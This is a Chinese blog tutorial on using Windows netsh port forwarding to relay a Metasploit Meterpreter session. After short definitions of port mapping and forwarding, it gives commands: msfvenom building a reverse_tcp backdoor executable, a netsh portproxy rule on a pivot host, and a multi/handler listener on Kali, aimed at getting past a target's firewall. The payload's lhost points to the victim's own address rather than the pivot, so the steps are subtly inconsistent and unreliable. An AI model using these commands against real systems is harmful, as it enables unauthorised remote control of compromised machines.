使用netsh进行端口转发监听meterperter

前言:可供选择的端口转发的很多,本文选择netsh来作为端口转发的例子。

知识前置

端口映射

是指将一台主机的内网(LAN)IP 地址映射成一个公网(WAN)IP 地址,当用
户访问提供映射端口主机的某个端口时,服务器将请求转移到本地局域网内部提
供这种特定服务的主机;利用端口映射功能还可以将一台外网 IP 地址机器的多
个端口映射到内网不同机器上的不同端口。

端口映射与端口转发

端口映射与端口转发,用于发布防火墙内部的服务器或者防火墙内部的客户端计
算机,有的路由器也有端口映射与端口转发功能。端口映射与端口转发实现的功
能类似,但又不完全一样。端口映射是将外网的一个端口完全映射给内网一个地
址的指定端口,而端口转发是将发往外网的一个端口的通信完全转发给内网一个
地址的指定端口。端口映射可以实现外网到内网和内网到外网双向的通信,而映
射转发只能实现外网到内网的单向通信。

netsh 端口映射

netsh 是 windows 系统自带的一个命令行工具,这个工具可以内置中端口转发功能。

应用场景

在服务器 A 上可以通过设置代理访问 B 服务器.如果拿到 b 服务器的权限 通
常是生成正向的后门,然后 kali 的 msf 可以正向连接 B 服务器,由此得到
metperter,进而进行其他操作。如果服务器 B 上有防火墙拦截,kali 的 msf 不能
正向连接上后门,为解决这问题,可以通过生成一个反向后门连接到服务器 A
上,在服务器 A 上再通过端口映射或者转发给 kali 的 msf 上。

实操步骤

现有kali                      192.168.0.1

执行端口转发A          192.168.0.2

执行后门B                 192.168.2.1

三台机器

1.Metasploit生成后门监听B的ip

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.1 lport=5555 -f exe > test.exe

2.转发服务A上执行命令,将端口 5555 转发到 kali 上的 5555 端口上

netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.0.1 connectport=5555

3.kali中MSF监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 5555

4.执行命令B执行后门程序即可获得转发后的meterperter。

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注